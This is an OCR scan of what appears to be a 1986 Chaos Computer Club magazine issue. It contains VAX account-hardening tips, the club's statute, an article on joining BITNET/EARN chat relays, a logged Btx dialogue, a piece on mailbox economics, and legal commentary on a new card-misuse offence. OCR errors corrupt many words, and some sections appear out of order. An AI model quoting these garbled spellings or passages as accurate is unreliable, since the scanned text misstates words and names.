Making it xxxxxxx is not enough since batch and 
network Jobs can still pass. Use the xxxxxxxxx 
qualifier in AUTHORIZE. Also, check that the hac¬ 
ker has not altered other records if you suspect he 
had privilege. xxxxxxxxxxxxx has a trivial com¬ 
mand flle to check for this. Finally, check that 
Strange flies wäre not created in the "attacked" 
account. -— 

(Special Thanx to A.S.) O 

KirdEr an die Macht 

"The reach of children” steht für 
"Gefahrenzone" bei Systefr.-Managern, 
die Hacken als antisoziale Tätigkeit 
schildern. Das widerlegt "Hilfe- 
Hacker" in dieser Hosgabe. "2 bis 3?. 
offener . Komiriuni kat i on, frei und 
unzensiert auf allen Medien" fordert 
MultiMediaGruppe MinusDeltaf. Diesen 
Anteil haben Hacker auf den 
Rechnersystemen - auch auf VAXen 
noch längst nicht erreicht. 


wau 







Die Informationsgesellschaft unserer Tage ist ohne Computer nicht mehr denkbar. Die Einsatzmöglich¬ 
keiten der automatisierten Datenverarbeitung und Datenübermittlung bergen Chancen, aber auch Ge¬ 
fahren für den Einzelnen und für die Geseilschaft. Informalions-und Kommunikationstechnologien ver¬ 
ändern das Verhältnis Mensch-Maschine und der Menschen untereinander. Die Entwicklung zur Infor¬ 
mationsgesellschaft erfordert ein neues Menschenrecht auf weltweite ungehinderte Kommunikation. 
Der Chaos Computer Club ist eine galaktische Gemeinschaft von Lebewesen, unabhängig von Alter, 
Geschlecht und Rasse sowie gesellschaftlicher Stellung, die sich grenzüberschreitend für Informations¬ 
freiheit einsetzt und mit den Auswirkungen von Technologien auf die Gesellschaft sowie das einzelne 
Lebewesen beschäftigt und das Wissen um diese Entwicklung fördert. 


§ 1 Name, Sitz, Geschäftsjahr 

(1) Der Verein führt den Namen “Chaos Computer 
Club“. Der Verein wird in das Vereinsregister ein¬ 
getragen und dann um den Zusatz “e.V.“ ergänzt. 
Der verein hat seinen Sitz in Hamburg. 

(2) Das Geschäftsjahr beginnt am 1. März jeden 
Kalenderjahres. 

§ z Zweck und Gemeinnützigkeit 

(1) Der Club fördert und unterstützt Vorhaben der 
Forschung. Wissenschaft & Bildung, Erziehung, 
Kunst & Kultur, sowie der Völkerverständigung im 
Sinne der Präambel oder führt diese durch. 

Der Vereinszweok soll unter anderem durch fol¬ 
gende Mittel erreicht werden: 

1. regelmäßige öffentliche Treffen und Informa¬ 
tionsveranstaltungen 

2. Veranstaltung undfoder Fördemng internatio¬ 
naler Congresse, Treffen, sowie Telekonferenzen 

3. Herausgabe der Zeitschrift ‘'Datenschleuder' 

4. Öffentlichkeitsarbeit und Teiepublishing in allen 
Medien 

5. Arbeits- und Erfahrungsaustauschkreise 

6. Informationsaustausch mit den in der Oaten- 
schutzgesetzgebung vorgesehenen Kontrollor¬ 
ganen 

7. Hacken 

8. Hilfestellung und Beratung bei technischen und 
rechtlichen Fragen im Rahmen der gesetzlichen 
Möglichkeiten für die Mitglieder 

(2) Der Club ist gemeinnützig; er dient aus¬ 
schließlich und unmittelbar der Volksbildung zum 
Nutzen der Allgemeinheit. Er darf keine Gewinne 
erzielen; er ist selbstlos tätig und verfolgt nicht in 
erster Linie eigenwirlschaftliche Zwecke. Die Mittel 
des Club werden ausschlie ßlich und unmittelbarzu 
den satzungsgemäßen Zwecken verwendet. Die 
Mitglieder erhalten keine Zuwendung aus den Mit¬ 
teln des Clubs. Niemand darf durch Ausgaben, die 
dem Zwecke des Clubs fremd sind oder durch 
unverhältnismäßig hohe Vergütungen begünstigt 
werden. 

§ 3 Mitgliedschaft 

(1) Ordentliche Clubmitglieder können natürliche 
und juristische Personen, Handelsgesellschaften, 
nicht rechtsfähige Vereine sowie Anstalten und 
Körperschaften des öffentlichen Rechts werden. 

(2) Die Beitrittserklärung erfolgt schriftlich oder 
fernschriftlich gegenüber dem Vorstand. Über die 
Annahme der Beitrittserklärung entscheidet der 


Vorstand. Die Mitgliedschaft beginnt mit der An¬ 
nahme der Beitrittserklärung. 

(3) Die Mitgliedschaft endet durch Austrittserklä¬ 
rung. durch Tod von natürlichen Personen oder 
durch Audösurtg und Erlöschen von juristischen 
Personen, Handelsgesellschaften, nicht rechtsfä-' 
higen Vereinen sowie Anstalten und Körper¬ 
schaften des öffentlichen Rechtes oder durch Aus¬ 
schluß; die Beitragsptlicht tür das laufende Ge¬ 
schäftsjahr bleibt hiervon unberührt. 

(4) Der Austritt ist nur zum Schluß eines Ge¬ 
schäftsjahres zulässig; die Austrittserklärung muß 
spätestens drei Monate vor Ablauf des Ge¬ 
schäftsjahres gegenüber dem Vorstand schriftlich 
abgegeben werden. 

(5) Die Mitgliederversammlung kann solche Per¬ 
sonen, die sich besondere Verdienste um den Club 
oder um die von ihm verfolgten satzungsgemäßen 
Zwecke erworben haben, zu Ehrenmitgliedern er¬ 
nennen. Ehrenmilgliederhaben alle Rechte eines 
ordentlichen Mitglieds. Sie sind von Beitragslei¬ 
stungen befreit. 

§ 4 Rechte und Pflichten der Mitglieder 

(1) Die Mitglieder sind berechtigt, die Leistungen 
des Clubs in Anspruch zu nehmen. 

(Z) Die Mitglieder sind verpflichtet, die satzungs¬ 
gemäßen Ävecke des Clubzu unterstützen und zu 
fördern. Sie sind verpflichtet, die festgesetzten 
Beiträge zu zahlen. 

§ 5 Ausschluß eines Mitgliedes 

(1) Ein Mitglied kann durch Beschluß des Vor¬ 
standes ausgeschlossen werden, wenn es das 
Ansehen des Clubs schädigt, seinen Beitrags¬ 
verpflichtungen nicht nachkommt oder wenn ein 
sonstiger wichtiger Grund vorliegt. Der Vorstand 
muß dem auszuschließenden Mitglied den Be¬ 
schluß in schriftlicher Form unter Angabe von 
Gründen mitteilen und ihm auf Verlangen eine 
Anhörung gewähren. 

(2) Gegen den Beschluß des Vorstandes ist die 
Anrufung der Mitgliederversammlung zulässig. Bis 
zum Beschluß der Mitgliederversammlung ruht die 
Mitgliedschaft. 

§ 6 Beitrag 

(1) Der Club erhebt einen Aufnahme- und Jah¬ 
resbeitrag. Er ist bei der Aufnahme und für das 
Geschäftsjahr im ersten Quartal des Jahres im 
voraus zu enfrichfen. Das Nähere regelt eine Bei¬ 


Dokunentation 


tragsordnung.die von der Mitgliederversammlung 
beschlossen wird. 

(2) Im begründeten Einzelfall Kann für ein Mitglied 
durch Vorstandsbeschluß ein von der Beitrag¬ 
sordnung abweichender Beitrag festgesetzt wer¬ 
den. 


5 


§ 7 Organe des Clubs 
Die Organe des Clubs sind 

1. die Mitgliederversammlung 

2. der Vorstand 

§ 8 Mitgliederversammlung 
(1) Oberstes Beschlußorgan ist die Mitglieder¬ 
versammlung. Ihrer Beschlußfassung unterliegen 

1. die Genehmigung das Finanzberichtes 

2. die Entlastung des Vorstandes, 

3. die Wahl der einzelnen Vorstandsmitglieder, 

4. die Bestellung von Finanzprüfern, 

5. Satzungsänderungen. 

6. die Genehmigung der Beitragsordnunm 

7. die Richtlinie über die Erstattung von Reiseko¬ 
sten und Auslagen, 

8. Anträge des Vorstandes und der Mitglieder, 
g. die Ernennung von Ehrenmitgliedern, 
fO.die Auflösung des Clubs. 

(3) Oie Mitgliederversammlung ist beschlußfähig, 
wenn mindestens fünfzehn Prozent aller Mitglieder 
anwesend sind. Beschlüsse sind jedoch gültig, 
wenn die Beschlußfähigkeit vor der Beschlußfas¬ 
sung nicht angezweifelt worden ist. 

(4) Beschlüsse über Satzungsänderungen und 
über die Autlösung des Clubs bedürfen zu ihrer 
Bechtswirksamkeit der Dreiviertelmehrheit der an¬ 
wesenden Mitglieder. In allen anderen Fällen ge¬ 
nüg! die einfache Mehrheit. 

(5) Jedes Mitglied hat eine Stimme. Juristische 
Personen haben einen Stimmberechtigten schrift¬ 
lich zu bestellen. 

(6) Auf Antrag eines Mitgliedes ist geheim abzu¬ 
stimmen. Über die Beschlüsse der Mitgliederver¬ 
sammlung ist ein Protokoll anzufertigen, das vom 
Versammlungsleiter und dem Protokollführer zu 
unterzeichnen ist; das Protokoll ist allen Mitglieder 
zugänglich zu machen und auf der nächsten Mit¬ 
gliederversammlung genehmigen zu lassen. 


(6) Der Schatzmeister überwacht die Haushalts¬ 
führung und verwaltetdas Vermögen des Clubs. Er 
hat auf eine sparsame und wirf sohaftliche Haus¬ 
haltsführung hinzuwirken. Mit dem Ablauf des Ge¬ 
schäftsjahres stellt er unverzüglich die Abrech¬ 
nung sowie die Vermögensübersicht und sonstige 
Unterlagen von Wirtschaft lichem Belang den Fi¬ 
nanzprüfern des Clubs zur Prüfung zur Verfügung. 

(7) Die Vorstandsmitglieder sind grundsätzlich eh¬ 
renamtlich tätig; sie haben Anspruch aut Erstat¬ 
tung notwendiger Auslagen im Rahmen einer von 
der Mitgliederversammlung zu beschließenden 
Richtlinie über die Erstattung von Reisekosten und 
Auslagen. 

(8) Der Vorstand kann einen "Wissenschaftlichen 
Beirat“ einrich len, der für den Club beratend und 
unterstützend tätig wird; in den Beirat können auch 
Nicht-Mitglieder berufen werden. 

§ 10 Finanzprüfer 

(1) Zur Kontrolle der Haushaltsführung bestellt die 
Mitgliederversammlung Finanzprüfer. Nach 
Durchführung ihrer Prüfung geben sie dem Vor¬ 
stand Kenntnis von ihrem Prüfungser gebnis und 
erstatten der Mitgliederversammlung Bericht. 

(2) Die Finanzprüfer dürfen dem Verstand nicht 
angehören. 

§ 11 Erfa-Organlsatlon 

(1) Der Club bildet zur Durchführung seiner Auf¬ 
gaben regionale Erfahrungsaustauschkreise 
(Erla-Kreise). Sie bestimmen ihre Organisations¬ 
struktur selbst. 

(2) Aufgabe der Erfa-Kreise ist ferner, 

1 . die Entscheidungsbildung im Club zu fördern 
und vorzubereiten, 

2. Mitglieder für den Club zu werben. 

(3) Beabsichtigt ein Erta-Kreis, bestimmte Themen 
oder Aktivitäten mit überregionalen Bezug an die 
Öffentlichkeit zu tragen, ist dies vorher mit dem 
Vorstand des Clubs abzustimmen. 

(4) Jeder Erfa-Kreis bestimmt einen Erfa-Kreis- 
Vertreter. Die Erfa-Kreise sollten sich eine Orga¬ 
nisationsstruktur geben, die mit dem Erfa-Beirat 
abzustimmen ist. 


§ 9 Vorstand 

(1) Der Vorstand besteht aus sieben Mitgliedern: 

1. den Vorsitzenden, 

2. zwei stellvertretenden Vorsitzenden, 

3. dem Schatzmeister, 

4. zwei Beisitzern und 

(2) Vorstand im Sinne des § 26 Abs. 2 BGB sind die 
Vorstandsmit glieder. Die Vertretungsmacht ist 
durch Beschlüsse des gesam ten Vorstandes be¬ 
grenzt. 

(3) Der Vorstand beschließtmitderMehrheit seiner 
satzungsge mäßen Mitglieder. Sind mehr als zwei 
Vorstandsmitglieder dauernd an der Ausübung 
ihres Amtes gehindert, so sind unverzüglich Nach¬ 
wahlen anzuberaumen. 

(4) Die Amtsdauerder Vorsfandsmitgliederbeträgt 
zwei Jahre; Wiederwahl ist zulässig. 

(5) Der Vorstand ist Dienstvorgesetzter aller vom 
Club angestel/ len Mitarbeiter; er kann diese Auf¬ 
gabe einem Vorstandsmitglied übertragen. 


§ 12 Erfa-Belrat 

(1) Der Erfa-Beirat besteht aus den Erfa- 
Vertretern, die Clubmitglieder sind. 

(2) Der Erfa-Beirat schlägt der Mitgliederver¬ 
sammlung aus seiner Mitte den Erfa- 
Repräsentanlen zur Wahl in den Vorstand vor. 

(3) Der Erfa-Beirat wirkt bei der Führung der Club¬ 
geschäfte beratend und unterstützend mit. Er hat 
dabei insbesondere die Aufgabe, die Belange der 
Erfa-Kreise zu vertreten. 

§ 13 Auflösung des Clubs 
Bei der Auflösung des Clubs oder bei Wegfall 
seines Zweckes fällt das Clubvermögen an eine 
von der Mitgliederversammlung zu bestimmende 
Körperschaft des öffentlichen Rechts oder eine 
andere steuerbegünstigte Körperschaft zwecks 
Verwendung für die Volksbildung. 

Hamburg, den 16. Februar 1986 




Bitnepp 

“FQr Immer wurde der Betrieb des Relays an der Cornell Universität in New York einge¬ 
stellt“; so berichtete die dpa-Meldung vom .... 

Wir wissen nicht, wer Ihnen diese freundliche Mitteilung überreicht hat, wir empfehlen 
’SEND/REM CORNELLC RLY’ (ehemals CORNELLC MAS). 


Angeblich haben esdie Hackerdoch geschafft, 
über BITNET ganze Rechnernetze herunter¬ 
zufahren und wichtige Dateien “unwissentlich 
vernichtet“. Wilde Spekulationen über Pla¬ 
nungen “elektronischer Bombeneinschläge“ 
wurden in den Pressemeldungen verlaulbart. 
Die “Hackergefahr kann nach Ansicht der Cor¬ 
nell Uni nicht so groß gewesen sein, da das 
System bereits nach etwa drei Monaten unter 
geringfügig geändertem Namen wieder am 
Netz hing. 

Zu EARN/BITNET, um das es in diesem Zu¬ 
sammenhang geht einige sachliche Anmer¬ 
kungen: 

Tatsache ist, daß Dialoge auf EARN/BITNET 
(von IBM gesponsert) mittels Konferenzproto¬ 
kollen ständig überwacht werden können und 
auch wurden. 

BITNET verbindet nahezu sämtliche Universi¬ 
täten und Forschungszentren in den USA und 
Europa (über EÄRN = European Academic 
Research Network) und bietet JEDEM Benut¬ 
zer der Rechner die Möglichkeit, Dateien mit 
JEDEM Benutzer desselben oder eines an¬ 
deren Rechners übers Netz auszutauschen. 
Zur Förderung der Kommunikation wurde ein 
sog. “Interchat Relay Network“ eingeführt, das 
online Konferenzscnaltungen erlaubt. So ha¬ 
ben sich zum Beispiel die Wissenschaftler, die 
die Giotto-Sonde zur Erforschung des Kome¬ 
ten Halle/ überwachten in der Zeit, in der sie 
nur darauf warteten, daß irgendetwas schief¬ 
geht die Langeweile bei einem lockeren Chat 
vertrieben. 

Eben auf diesen “Relays“ haben sich auch 
deutsche und Schweizer Hacker etabliert, um 
an den Gesprächen konstruktiv teilzunehmen. 
Es ist also wie gesagt nicht möglich, auf frem¬ 
den Rechnern Dateien zu löschen oder gar 
Betriebs^stemkommandos auszuführen, d.h. 
die dpa-Pressemeldung lieferte einfach irre¬ 
führende Informationen. 

Doch zurückzu BITNET/EARN: DerSchweizer 
Zentralknoten CEARN (Genf) ist mit Darm¬ 
stadt, Paris, Rutherford, Rom und Stockholm 
direkt verbunden und führt via diese Knoten 
theoretisch direkt in die USA, z.B. an die Ge¬ 
orge Washington University in New York, prak¬ 
tisch klappt die Verbindung nicht immer rei¬ 
bungslos (Murphy schlug bereits diverse Male 
zu). An EARN hängen z.B. (fast) alle deutschen 
Unis, das DESY in Hamburg, das DFVLR in 
München, Gern in der Schweiz und einige NA¬ 
SA Rechner. Für Ottonormalforscher sind de¬ 


rartige interessante Perspektiven völlig ver¬ 
schlossen, Heinz Hacker wird von Netzbetrei¬ 
bern immer noch ungern gesehen (“Fritz is 
online"). 

EARN/BITNET ist für jeden eine sehr interes¬ 
sante Sache, denn neben lockeren Chats fin¬ 
det speziell in den Konferenzen ein reger 
Know-How-Austausch statt, über letzteres ver¬ 
fügen Hacker unbestritten ! 

Nebenbei: EARN wird von der 3-Buchstaben- 
Firma bis Ende 1987 finanziert, so daß es 
natürlich für diverse Forschungsinstitute in 
Deutschland kein Problem ist, sich (via Datex- 
L) daran zu beteiligen, zumindest solange es 
sich um SNA-(un)fähige Systeme handelt. 
Nicht erst ab 1988 gilt also für IBM: “Let’s EARN 
some moneyl“, von der parasitären Know- 
How-Beschaffung ganz abgesehen. 

Warum eigentlich den Hackern, den wahren 
Verfechtern der freien Kommunikation der Zu¬ 
griff verweigert werden soll, ist nicht einzuse¬ 
hen, denn unbestritten bleibt doch der For¬ 
schungsauftrag der Hacker, der eine Teilnah¬ 
me an diesem Netz geradezu zwingend vor¬ 
schreibt I 

Zum Schluß noch ein paar Tips für jene Da¬ 
tenreisenden, die über einen EARN oder BIT¬ 
NET Zugang verfügen: 

Auf VAXen: SEND/REM CEARN RELAY in 
Europa oder SEND/REM BITNIC RELAY in 
USA, um an den Konferenzen teilzunehmen, 
dann /h für Help. 

Auf IBM/VM Kisten: TELL RELAY AT CEARN 
/h usw.l Empfehlenswert: das Relay an der 
Cornell-Uni sollte bevorzugt behandelt werden 
(CORNELLC RLY), ist aber nur zwischen 9:00 
pm und 6:00 am lokaler Zeit erreichbar. 

Aber keine elektronischen Bombeneinschläge 
planen oder gar Giotto auf dem Mars landen 
lassen, sonst wird die Cornell-Uni keine wei¬ 
teren Studienbewerbungen mehr annehmen. 


FRIMP & VIC, (the Networker Crew) 



Mailboxen im 
Btx-Wartesaal 

über externe Rechner wurde In Bild¬ 
schirmtext eine DIalogmögllchkeit ge¬ 
schaffen. 

Einen guten Eindruck gibt der folgende 
Dialogmitschnitt; die Btx-übiiehen 
Verwaltungs- und Farbinformationen wur¬ 
den gestrichen. 

Teilnehmer waren hallo und chaos-team 

001: Dialog-Beginn 14:55:26 
hallo aus HH 

hallo aus hh, hier ist das chaos-team. 
und welche Mission treibt euch hierher? 
Wirtesten die Wartezeiten 
(abgeschickt 14:58:22:angezeigt wurde durch 
Übermittlungsfehler “Eilgabe abgeschickt“ 
statt “Eingabe abgesohickt“. Dia Antwort traf 
um 15:01:03 ein.) 

na dann viel Spaß. Testet mal auch, wie oft 
man hier rausfliegt. Ich wurde heute schon 6 
mal hinausbefördert, aber das glauben die 
Veranstalter mir nicht. 

ß da ist der msg dienst im postsystem schneller 

und bald wohl auch preiswerter 

ganz sicher, aber nicht das Angebot 

wie endet der dialog, wenn du nicht mehr da 

bist (rausfliegst) für uns, merkt das System 

das? 

mein Partner sendet noch eine Mitt. ab, die 
nicht ankommt, ich erhalte eine Postseite mit: 
die Verbindung wurde unterbrochen aus tech¬ 
nischen Gründen. 

ist bekannt, welche gebühren geplant sind? 
ich weiß nur das, was am Anfang gesagt wird. 
0,08 pro Dialogschritt und 0,50 für den Ein¬ 
stieg. 

0,07 kostet eine versendete msg über mail- 
boxsysteme, der dialog dort in echtzeit 25 pfg 
die minute - welchen namen hat die system¬ 
zentrale? 

weiß nicht, aber da sind meistens Beobachter 
im Programm unter ICR, Baff oder eine Kom¬ 
bination davon. 

danke, dürfen wir diesen dialog veröffentli¬ 
chen? 

gerne, wenn er aussagekräftig genug ist 
ok, wie beendet man den dialog? 
die nächste msg nicht absenden 

Um 15:22:14 konnten wir den zweiten und 
vorerst letzten Dialog beginnen. EinTestlesen 
des Artikels dauerte xx Sekunden; per Btx ca. 
20 Minuten. 

/xiAvB/btxnibx16.wau 860401 1911 

Glaube an neue Dienste 

Btx-Schwund statt Schwung bringt die neue 
Gebührenordnung. Zum Rückgang der An¬ 
bieterzahlen meinte der Leiter des Fernmel¬ 
deamtes in N. (Q:sz860701 s26): “Man muß an 
neue Dienste glauben...“ 


CCC auf kommerziellen Boxen 
- Rückschlag für private Be¬ 
treiber ? 

"...aber in den Zentren keimt es. Einige Sysops ge¬ 
stalten ihre rmationssysteme bewuat, sie agieren als 
elektronische Verieger." 

So stand es in 0514 in der Ankündigung des Chaos 
Communication Congress '85. Den lokalen Maiiboxen 
wurde steigende Qualität beseheinigt, das Bewusstsein 
der Betreiber für die Erfordernisse der Kommunika¬ 
tionsgesellschaft sei gestiegen. 

Tatsächlich gibt es überall in diesem unseren Lande 
Sysops, für die ihre Mailbox mehr ist, als nur eine 
elektronische Muilhalde. Diese Betreiber investieren 
sehr viel Zeit und noch mehr Geld in die Entwicklung der 
lokalen Systeme, um eine Angleiohung an den Stan¬ 
dard der kommerziellen Boxen zu erreichen, ja diesen 
Standard in der Hinsicht zu ubertreHen, daa sie dem 
alten Grundsatz treu bleiben “Soviel Information wie 
möglich, so preiswert wie möglich". Da werden mal eben 
10.000 DM in Hardware gesteckt, hunderte von Ar¬ 
beitsstunden In Programmentwicklung investiert. Trei¬ 
bende Kraft bei dieser Entwicklung war dabei auch der 
CCC, der immerwieder unablaaig forderte, die lokalen 
Systeme muaten weg von der CB-Mullbox, hin zum 
(semi-) professionellen Standard. Undtatsachlich fielen 
diese Anregungen bei etlichen Betreibern auf frucht¬ 
baren Boden, inzwischen entstehen bundesweit überall 
Systeme, die aut mehreren Leitungen gleichzeitig er¬ 
reichbar sind, teilweise auch über Patlex-D. 

Das Hauptproblem für die Betreiber dieser Systeme ist 
dabei, dem Otto-No rmal-User klarzumachen, daa diese 
qualitativ hochwertigen regionalen Systeme nicht mehr 
kostenlos zugänglich seinkonnen, wenn allein die Fern- 
meldegebuhrenbis zu 400.- DM pro Monat betragen. 
Das ist angesichts der unzähligen C64-Boxen, die zum 
Nulltarif am Netz hangen, schon ein schwieriges Un¬ 
terfangen, das nur durch die erhebliche Leistungsstei¬ 
gerung gegenüber den herkömmlichen Syslemen sinn¬ 
voll und damit machbar wird. Nicht zu vergessen, daa 
die neuen regionalen und überregionalen Boxen auch 
ein gutes Stuck mehr an informationeller Selbstbe¬ 
stimmung bieten, denn es stecken ja immer noch die¬ 
selben Leute dahinter, die im besten Sinne chaotischer 
Tradition agieren, In diese sehr schwierige Situation 
hinein platzt nun die Ankündigung des CCC, seinen 
Mitgliedern die Möglichkeit zu geben, ein kommerzielles 
Mailbox^stem für einen unglaublich günstigen Preis zu 
nutzen. Das ist auf den ersten Blick eine sensationelle 
Sache, denn bisher waren kommerzielle Boxen auf¬ 
grund der hohen Monatsgebuhren für normale Sterb¬ 
liche unerreichbar. Auf efen zweiten Blick jedoch er¬ 
geben sich daraus harte Konsequenzen für diejenigen 
Sysops, die erade dabei sind, ihre Systeme, wie oben 
beschrieben, auszubauen, denn angesichts der neue¬ 
sten Entwicklung erscheint es zunächst sinnlos, die 
Projekte Weiterzufuhren. Wozu ein System errichten, 
dass dem Benutzer für fünf Mark im Monat ein Subset 
der Leistungen kommerzieller Boxen bietet, wenn für 
relativ geringe Mehrkosten der Zugang zu den kom¬ 
merziellen Systemen offen ist? Zwar ist dafür die Mit¬ 
gliedschaft im CCC notwendig, was bei den normalen 
Boxen nicht der Fall ist, aber es steht zu befurchten, daa 
es üblich wird, CCC-Mitglied zu werden, um in den 
Genuss der kommerziellen Box zu kommen. Diese 
Entwicklung kann .durchaus dazu fuhren, daa die au¬ 
genblicklichen Versuche, eine autonome Informa¬ 
tionsszene hohen Standards auzubauen, im Keime 
erstickt, oder zumindest auf lange Sicht behindert wer¬ 
den und es stellt sich die Frage, ob das tatsächlich im 
Sinne des Chaos Computer Clubs ist. 

cxxl)äi16.di 6S0SQ2 2020 goblin 



























recht 

Zu Aitihel 1 Nr. S — §26eaStGB — 

Neben einer redaktionellen Klarstellung bat der 
Ausschuß die Überschrift erweitert Dadurch soll 
vor allem die unterschiedliche Schutzrichtung zwi¬ 
schen Abs. 1 und Abs. 2 noch stärker verdeutlicht 
werden. Während Absatz 2, wie sich schon aus der 
Fassung ergibt ein untreueähnliches Verhalten des 
Arbeitgebers (und der ihm durch § 14 StGB gleich¬ 
gestellten Personen) rum Nachteil des Arbeitneh¬ 
mers erfassen will handelt es sich bei Absatz 1 (und 
ähnlich bei Absatz 3) um den Schutz der Soüdarge- 
meinschaft. Das Aufkommen der Sozialversiche- 
Tungsträger und der Bundesanstalt für Arbeit soll 
dadurch strafrechtlich gewährleistet werden. Dies 
ist in Absata l durch die Streichung eingrenzender 
Merkmale des geltenden Rechts („erhalten“, „einbe¬ 
halten“) verdeutlicht worden, wodurch sich Absatz 1 
bewußt von Absatz 2 unterscheidet Damit können 
künftig auch Falle bestraft werden, in denen Arbeit¬ 
geber und Arbeitnehmer einveinehmlich verabre¬ 
den, bei Lohnzahlungen keine Beiträge abzuführen 
(zum bisherigen Recht vgl, BGH wistra 1982, 111). 
Da sich dies aus dem Wortlaut der Entwürfe bereits 
ergibt, ist eine zusätzliche Ergänzung des Teartes, 
wie dies von dem Sachverständigen Stahlschmidt 
in der öffentlichen Anhörung erwogen vmrde (vgl. 
Prot Nf.28. Anl. S. 6). nicht erforderlich. Auch unter 
Berücksichtigung der im Wirtschaftsaiisschufi ge¬ 
äußerten Kritik an § 268 a StGB ist der Ausschuß 
der Meinung, daß die Aufbringung der Mittel der 
Sozialversicherung ebenso wie die des Steuerauf¬ 
kommens eines besonderen strafrechtlichen 
Schutzes bedarf. Davon geht schon das geltende 


Recht aus. 


Zu Artikel 1 Nr. 5 — § 26Öb StGB — 

Der Rechtsausschuß empfiehlt mit Mehrheit, eine 
Strafvorschrift gegen den Mißbrauch von Scheck- 
und Kreditkarten einzuführeiL 

Dos Scheck- und Kredithartensystero hat inzwi¬ 
schen zu einer außerordentlichen Ausweitung des 
bargeldlosen Zahlungsverkehrs geführt und da¬ 
durch eine erhebliche volkswirtschaftliche Bedeu¬ 
tung erlangt Das Scheckkarten ausstellende Kre¬ 
ditinstitut garantiert hierbei die Einlösung von 
Schecks auf speziellen zur Scheckkarte ausgegebe¬ 
nen Scheckformularen bis zu einem bestimmten 
Betrag (zur Zeit 400 DM) und nimmt damit dem 
Schecknehmer das Risiko eines ungedeckten 
Schecks ab. 

Das Kreditkartengeschäft im Drei-Partner-System 
beruht auf dem gleichen Grundgedanken. Das Kar¬ 
ten ausstellende Institut verpflichtet sich gegen¬ 
über dem Vertragsuntemehmeo, seine Forderun¬ 
gen gegen dem Karteninhaber auszugleichen. Da¬ 
bei ist es üblich, dem Vertragsuntemehmen Jeweils 
unterschiedliche Obergrenzen für einzelne Ge¬ 
schäfte zu setzen, bei deren Überschreitung Ver¬ 
tragsuntemehmen bei Vorlage der Kreditkarte eine 
Genehmigung des Kreditkarteninstituts einholen 
müssen oder die Einlösungsgarantie verlieren. Da¬ 
neben ist auch das Zwci-Partner-System gebräuch¬ 
lich. Hierbei räumt ein Unternehmen mit der Kre¬ 
ditkartenausgabe seinem Kunden lediglich einen 
für alle Filialen gültigen Kundenkredit ein. 



Durch die neue Strafvorschrift soll der Fall erfaßt 
werden, daß ein Scheck* oder Kreditkartennehmer 
unter Verwendung der Karte Waren kauft und 
Dienstleistungen in Anspruch nimmt obwohl er 
weiß, daß dos Kreditinstitut seine Rechnungen zu 
bezahlen hat und er selbst aber, z. B. nach einem 
Vermögeosverfall nicht mehr in der Lage sein wird, 
die Auslagen zuruckruerstatten. Bestraft werden 
soll die dadurch verursachte Vermögensschädigung 
der ECreditinstitute. 

Der Bundesgerichtshof hat in einem Urteil vom 
13. Juni 1985,4 StR 213/85 (BGHSt33.244) zum Kre- 
ditkartemnißbrauch festgestellt daß eine solche 
Tathandluiig nicht den Tatbestand der Untreue und 
des Betrugs erfülle. Allerdings hat der Bundesge¬ 
richtshof in seiner Entscheidung vom 13. Juni 1985 
unter Bestätigung seiner Entscheidung vom 26. Juli 
1972 (BGHSt 24, 386) entschieden, daß ein Mi߬ 
brauch der Scheckkarte durch den Karteoinhal^r 
den allgemeinen BetrugstatbesUnd nach §263 
StGB erfülle. Er hat hierbei darauf abgestellt, d«Q 
die Scheckkarte im Scheckverkehr vorgetegt werde 
und nur den zusätzlichen Nachweis der Einlösega- 
rantie erbringe, während die eigentliche Handlung 
mit Erklärungswert die Hingabe des Schecks sei. 
Insoweit bestehe kein wesensmäßtger Unterschied 
zu der Einlösung eines ungedeckten Schecks ohne 
Scheckkarte. Diese Rechtsprechung des Bundesge¬ 
richtshofs wird vom Schrifttum bis heute mit der 
Begründung heftig kritisiert, daß sie mit den Gege¬ 
benheiten des Scheckkortenverkehrs nicht im Ein¬ 
klang sei. Wie bei der Vorlage einer Kreditkarte 
brauche der Schecknehmer sich bei der Vorlage der 
Scheckkarte bis zur garantierten Summe über die 
Kreditwürdigkeit des Scheckausstellers keine Ge¬ 
danken zu machen und werde das in der Regel auch 
nicht tun. Die Voraussetzungen des Betrugstatbe- 
Stands, nämlich der für die VermÖgensverfügungen 
ursächliche Irrtum, sind deshalb ln dieaen Fällen 
nicht gegeben. Angesichte dieser Kritik aus dem 
Schrifttum ist davon auszugebeo, daß die Entschei¬ 
dung des Bundesgerichtshofs auf Dauer schwerlich 
Bestand haben werde. 

Im Rechtsausschuß ist umstritten, ob der darge¬ 
stellte Mißbrauch von Scheck- und Kreditkarten 
strafwürdig ist Noch Auffassung der Mehrheit 
weist die dargestellte Tathaodlung gegenüber dem 
geltenden Untreuetatbestand einen ähnlichen so¬ 
zialschädlichen Kriminalitatsgebalt auf. Der neue 
Straftatbestand sei zum Schule der F\mktionsfä- 
higkelt des beugeldlosen Zahlungsverkehrs, der 
eine volkswirtschaftliche Bedeutung erlangt habe, 
notwendig. 

Oie Minderheit lehnt die neue Strafvorschrift ab. 
Sie ist der Auffassung, daß die Verwendung der 
Scheck-, vor ollem der Kreditkarten, allgemein kei¬ 
neswegs so positiv eiozuschätzea sei. da das Kredit- 
und Scheckkartensystem die Gefahr einer Über¬ 
schuldung der Inhaber io sich berge, wie es sich ln 
den USA gezeigt habe. Vor allem würde mit dem 
Straftatbestand in systerowidriger Weise die Verlet¬ 
zung von Vertragspflichtea strafrechtlich sanktio¬ 
niert und der notwendige Rechtsschutz sei durch 
das Zivilrecht gewährleistet Insbesondere sei es 
Aufgabe der Kreditinstitute, sich durch eine ent¬ 
sprechende Ausgestaltung der Rechtsbeziehungen 
zu den Inhabern der Scheckkarten und Kreditkar¬ 
ten und zu den Vertragsfirmen sowie durch eine 
sorgfältige Prüfung der Kreditwürdigkeit ihrer 
Kunden zu schützen. 


Einigkeit bestand im Ausschuß, daß keine Notwen¬ 
digkeit besteht, den Tatbestand auf andere Fälle 
von Mißbräuchen, insbesondere auf den Gebrauch 
von Scheck- und Kreditkarten durch Nichtberech¬ 
tigte auszudehnen. Die Anwendung des Betrugstat¬ 
bestandes reicht hier aus. 

Zu der Ausgestaltung der von der Mehrheit be¬ 
schlossenen Strafvorschrift ist zu bemerken: 

Ahiotz I lehnt sich in seiner Einzelausgestaltung 
eng an den Mißbrauchstatbestand des § 266 StGB 

(Untreue) an. Durch die Wendung.die ihm durch 

die Überlassung einer Scheckkarte oder einer Kre¬ 
ditkarte eingeräurate Möglichkeit, den Aussteller 
zu einer Zahlung zu veranlassen“ wird der Täter¬ 
kreis auf berechtigte Karteninhaber eingegreiut 
und auch die Garantieerklärung, die mit der Über¬ 
